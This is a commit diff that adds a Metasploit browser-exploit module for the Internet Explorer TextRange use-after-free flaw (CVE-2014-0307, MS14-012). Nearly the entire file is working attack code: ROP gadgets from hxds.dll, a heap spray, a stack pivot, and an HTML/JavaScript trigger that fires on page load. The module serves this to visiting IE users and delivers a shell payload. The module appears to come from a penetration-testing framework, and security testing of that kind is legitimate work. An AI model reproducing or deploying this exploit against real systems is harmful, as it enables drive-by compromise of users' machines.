Land rapid7#3120, @wchen-r7's exploit for CVE-2014-0307

jvazquez-r7 · jvazquez-r7 · commit a5afd929b421 · 2014-03-20T11:16:40.000-05:00
diff --git a/modules/exploits/windows/browser/ms14_012_textrange.rb b/modules/exploits/windows/browser/ms14_012_textrange.rb
@@ -0,0 +1,154 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "MS14-012 Internet Explorer TextRange Use-After-Free",
+      'Description'    => %q{
+        This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw
+        was most likely introduced back in 2013, therefore only certain builds of MSHTML are
+        affected. In our testing with IE9, these vulnerable builds appear to be between
+        9.0.8112.16496 and 9.0.8112.16533, which implies August 2013 until early March 2014
+        (before the patch).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Jason Kratzer', # Original discovery
+          'sinn3r'         # Port
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2014-0307' ],
+          [ 'MSB', 'MS14-012' ]
+        ],
+      'Platform'       => 'win',
+      'BrowserRequirements' =>
+        {
+          :source  => /script/i,
+          :os_name => OperatingSystems::WINDOWS,
+          :ua_name => HttpClients::IE,
+          :office  => "2010"
+          #:ua_ver  => '9.0' # Some fingerprinting issue w/ os_detect, disabled for now
+        },
+      'Targets'        =>
+        [
+          [
+            'Automatic',
+              {
+                # mov eax,dword ptr [edx+0C4h]; call eax
+                'Pivot' => 0x0c0d1020 # ECX
+              }
+          ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars'       => "\x00",
+          'PrependEncoder' => "\x81\xc4\x0c\xfe\xff\xff" # add esp, -500
+        },
+      'DefaultOptions'  =>
+        {
+          'Retries'              => false, # You're too kind, tab recovery, I only need 1 shell.
+          'InitialAutoRunScript' => 'migrate -f'
+        },
+      'DisclosureDate' => "Mar 11 2014", # Vuln was found in 2013. Mar 11 = Patch tuesday
+      'DefaultTarget'  => 0))
+  end
+
+  # hxds.dll
+  def get_payload
+    setup =
+    [
+      0x51C3B376, # rop nop
+      0x51C2046E, # pop edi; ret
+      0x51BE4A41, # xchg eax, esp; ret
+    ].pack("V*")
+
+    # rop nops
+    45.times { setup << [0x51C3B376].pack('V*') }
+
+    setup << [
+      0x51C2046E, # pop edi ; ret
+      0x51BD28D4  # mov eax, [ecx], call [eax+8]
+    ].pack('V*')
+
+    p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})
+
+    Rex::Text.to_unescape(p)
+  end
+
+  def exploit_html
+    template = %Q|<!DOCTYPE html>
+<html>
+  <head>
+    <meta http-equiv='Cache-Control' content='no-cache'/>
+    <meta http-equiv="X-UA-Compatible" content="IE=edge" >
+    <script>
+      <%=js_property_spray%>
+      sprayHeap({shellcode:unescape("<%=get_payload%>")});
+
+      function hxds() {
+        try {
+          location.href = 'ms-help:';
+        } catch(e) {}
+      }
+
+      function strike() {
+        hxds();
+        var fake = "";
+        for (var i = 0; i < 12; i++) {
+          if (i==0) {
+             fake += unescape("<%=Rex::Text.to_unescape([target['Pivot']].pack('V*'))%>");
+          }
+          else {
+            fake += "\\u4141\\u4141";
+          }
+        }
+
+        var elements = [
+          'FOOTER', 'VIDEO', 'HTML', 'DIV', 'WBR', 'THEAD', 'PARAM', 'SECTION', 'IMG',
+          'TIME', 'ASISE', 'CANVAS', 'P', 'RT', 'FRAMESET', 'TRACK', 'CAPTION'
+        ];
+
+        for (var i = 0; i < elements.length; i++) {
+          var element = document.createElement(elements[i]);
+          document.body.appendChild(element);
+        }
+
+        var tRange = document.body.createTextRange();
+        tRange.moveToElementText(document.body.children[16]);
+        tRange.execCommand('InsertInputSubmit', true, null);
+        tRange.moveToElementText(document.body.children[0]);
+        tRange.moveEnd('character',4);
+        tRange.execCommand('InsertOrderedList', true, null);
+        tRange.select();
+        tRange.moveToElementText(document.body.children[0]);
+        tRange.moveEnd('character',13);
+        tRange.execCommand('Underline', true, null);
+        tRange.execCommand('RemoveFormat', true, null);
+        var fillObject = document.createElement('button');
+        fillObject.className = fake;
+      }
+    </script>
+  </head>
+  <body onload='strike();'></body>
+</html>
+    |
+
+    return template, binding()
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    send_exploit_html(cli, exploit_html)
+  end
+
+end
